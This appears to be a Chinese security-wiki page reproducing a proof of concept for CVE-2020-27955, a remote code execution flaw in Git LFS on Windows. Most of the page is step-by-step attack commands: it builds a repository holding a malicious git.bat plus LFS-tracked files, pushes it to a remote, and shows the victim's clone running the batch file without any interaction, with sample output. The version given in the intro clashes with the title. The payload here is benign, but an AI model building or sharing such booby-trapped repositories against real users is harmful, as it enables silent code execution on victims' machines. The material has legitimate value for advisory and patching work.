menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Git _= 2.29.2 Git-LFS-RCE-Exploit-CVE-2020-27955.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Git _= 2.29.2 Git-LFS-RCE-Exploit-CVE-2020-27955.md
    2.64 KB / 2021-05-21 09:14:38
        # Git <= 2.29.2 Git-LFS-RCE-Exploit-CVE-2020-27955


Git是一个免费的开源分布式版本控制系统,旨在快速高效地处理从小型到大型项目的所有事务。Git <= 2.12版本的Git LFS(git-lfs)具有允许远程命令执行的漏洞,攻击者可以在受害者的Windows系统上执行任意代码。

Git LFS是“用于对大文件进行版本控制的开源Git扩展。

https://git-lfs.github.com/

官网:https://git-scm.com/

发现者:Dawid Golunski

PoC:

使用以下步骤准备git的git-lfs PoC:


```
Attacker:

On a separate linux system (to prevent execution on the localhost on commit):


1. Create a new repository:

    mkdir git-lfs-RCE-exploit
    cd git-lfs-RCE-exploit
    git init


2. Prepare a malicious executable. E.g: git.bat with the following contents:

    @echo hacked > GITHACKED


3. Add the executable to the repository:

    git add git.bat


4. Add LFS file entries to the repository. This is necessary to trigger 
the vulnerable git-lfs submodule when the repository is cloned and processed
by the main git process.

    git lfs track "*.dat"
    git add .gitattributes

    echo "git exploit PoC" > big-bug-lfs-file.dat
    git add big-bug-lfs-file.dat


5. Commit both the exploit and the lfs files:

    git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
    

6. Push the changes to the repository:

    git remote add origin https://github.com/some-user-name/lfspoc
    git push -u origin master



Victim:

On windows, run powershell.exe shell and clone the PoC repo:

    git clone https://github.com/some-user-name/lfspoc .

At this point the malicious executable (git.bat) will be downloaded into the repo's directory
and automatically executed by the git-lfs submodule without any user interaction. 


As a result, 'GITHACKED' file should appear in the repo's directory 
To check, type:

    dir 




Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:

C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .

Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...

C:\Users\victim> type GITHACKED
hacked
```

https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

https://forum.ywhack.com/thread-114689-1-5.html
    links
    file_download